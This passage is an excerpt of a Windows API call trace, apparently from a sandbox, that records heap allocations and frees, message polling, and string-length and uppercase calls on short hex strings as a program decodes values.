hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee728 | out: hHeap=0x2af0000) returned 1 [0082.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee590 | out: hHeap=0x2af0000) returned 1 [0082.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b718 | out: hHeap=0x2af0000) returned 1 [0082.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0082.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b0b8 | out: hHeap=0x2af0000) returned 1 [0082.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee710 | out: hHeap=0x2af0000) returned 1 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee728 [0082.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee530 | out: hHeap=0x2af0000) returned 1 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee590 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee7b8 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b0b8 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e4240 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee4d0 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b5c8 [0082.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee4d0 | out: hHeap=0x2af0000) returned 1 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e41a0 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee4d0 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5a8 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6d8 [0082.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee590 | out: hHeap=0x2af0000) returned 1 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e4038 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b588 [0082.735] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e4038 | out: hHeap=0x2af0000) returned 1 [0082.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b588 | out: hHeap=0x2af0000) returned 1 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a6b618 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee590 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee650 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b638 [0082.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b628 [0082.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b628 | out: hHeap=0x2af0000) returned 1 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee620 [0082.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b638 | out: hHeap=0x2af0000) returned 1 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ee518 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e4088 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee530 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b718 [0082.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee530 | out: hHeap=0x2af0000) returned 1 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e4178 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee698 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee710 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0082.736] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee770 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b6a8 [0082.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee770 | out: hHeap=0x2af0000) returned 1 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e42b8 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee770 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee530 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b638 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e42e0 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5d8 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b728 [0082.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5d8 | out: hHeap=0x2af0000) returned 1 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e40d8 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5d8 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5f0 [0082.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e42b8 | out: hHeap=0x2af0000) returned 1 [0082.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6a8 | out: hHeap=0x2af0000) returned 1 [0082.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee770 | out: hHeap=0x2af0000) returned 1 [0082.736] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e3ef8 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee770 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b628 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee608 [0082.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6c8 [0082.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6c8 | out: hHeap=0x2af0000) returned 1 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5b8 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea40 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea28 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b588 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee9c8 [0082.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b588 | out: hHeap=0x2af0000) returned 1 [0082.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee9c8 | out: hHeap=0x2af0000) returned 1 [0082.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea28 | out: hHeap=0x2af0000) returned 1 [0082.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea40 | out: hHeap=0x2af0000) returned 1 [0082.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5b8 | out: hHeap=0x2af0000) returned 1 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b738 [0082.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b738 | out: hHeap=0x2af0000) returned 1 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0082.737] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b588 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea40 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee9b0 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b708 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea10 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee938 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b648 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee9c8 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee950 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6e8 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee8f0 [0082.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6e8 | out: hHeap=0x2af0000) returned 1 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee968 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b658 [0082.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b658 | out: hHeap=0x2af0000) returned 1 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eeaa0 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b678 [0082.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b678 | out: hHeap=0x2af0000) returned 1 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee800 [0082.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b5e8 [0082.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee7e8 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee8f0 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee950 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee968 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eeaa0 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee9c8 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b648 | out: hHeap=0x2af0000) returned 1 [0082.738] lstrlenW (lpString="20") returned 2 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee800 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5e8 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee7e8 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee938 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea10 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b708 | out: hHeap=0x2af0000) returned 1 [0082.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee7e8 [0082.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee980 [0082.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b5d8 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee9b0 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea40 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b588 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee980 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5d8 | out: hHeap=0x2af0000) returned 1 [0082.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee7e8 | out: hHeap=0x2af0000) returned 1 [0082.738] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.738] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6e8 [0082.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee860 [0082.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eeaa0 [0082.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6f8 [0082.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee968 [0082.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee818 [0082.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b648 [0082.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee9c8 [0082.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea40 [0082.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b588 [0082.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee980 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b588 | out: hHeap=0x2af0000) returned 1 [0082.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee908 [0082.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5d8 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5d8 | out: hHeap=0x2af0000) returned 1 [0082.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee7e8 [0082.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b658 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b658 | out: hHeap=0x2af0000) returned 1 [0082.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee920 [0082.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b5e8 [0082.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee9e0 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee980 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea40 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee908 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee7e8 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee9c8 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b648 | out: hHeap=0x2af0000) returned 1 [0082.739] lstrlenW (lpString="31") returned 2 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee920 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5e8 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee9e0 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee818 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee968 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6f8 | out: hHeap=0x2af0000) returned 1 [0082.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee878 [0082.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee920 [0082.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b5d8 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eeaa0 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee860 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6e8 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee920 | out: hHeap=0x2af0000) returned 1 [0082.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5d8 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee878 | out: hHeap=0x2af0000) returned 1 [0082.740] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.740] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6a8 [0082.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee998 [0082.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee848 [0082.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b678 [0082.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee890 [0082.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee7d0 [0082.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6f8 [0082.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee878 [0082.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee9c8 [0082.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5d8 [0082.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea28 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5d8 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5e8 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b648 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea28 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee9c8 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee860 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eeab8 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee878 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6f8 | out: hHeap=0x2af0000) returned 1 [0082.740] lstrlenW (lpString="20") returned 2 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee980 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b768 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee7e8 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee7d0 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee890 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b678 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee848 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee998 | out: hHeap=0x2af0000) returned 1 [0082.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6a8 | out: hHeap=0x2af0000) returned 1 [0082.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee9b0 | out: hHeap=0x2af0000) returned 1 [0082.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5d8 | out: hHeap=0x2af0000) returned 1 [0082.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee9f8 | out: hHeap=0x2af0000) returned 1 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b588 | out: hHeap=0x2af0000) returned 1 [0082.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee908 | out: hHeap=0x2af0000) returned 1 [0082.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee9e0 | out: hHeap=0x2af0000) returned 1 [0082.741] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] lstrlenW (lpString="4C") returned 2 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] lstrlenW (lpString="6F") returned 2 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] lstrlenW (lpString="63") returned 2 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] lstrlenW (lpString="6B") returned 2 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] lstrlenW (lpString="2E") returned 2 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.741] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.742] 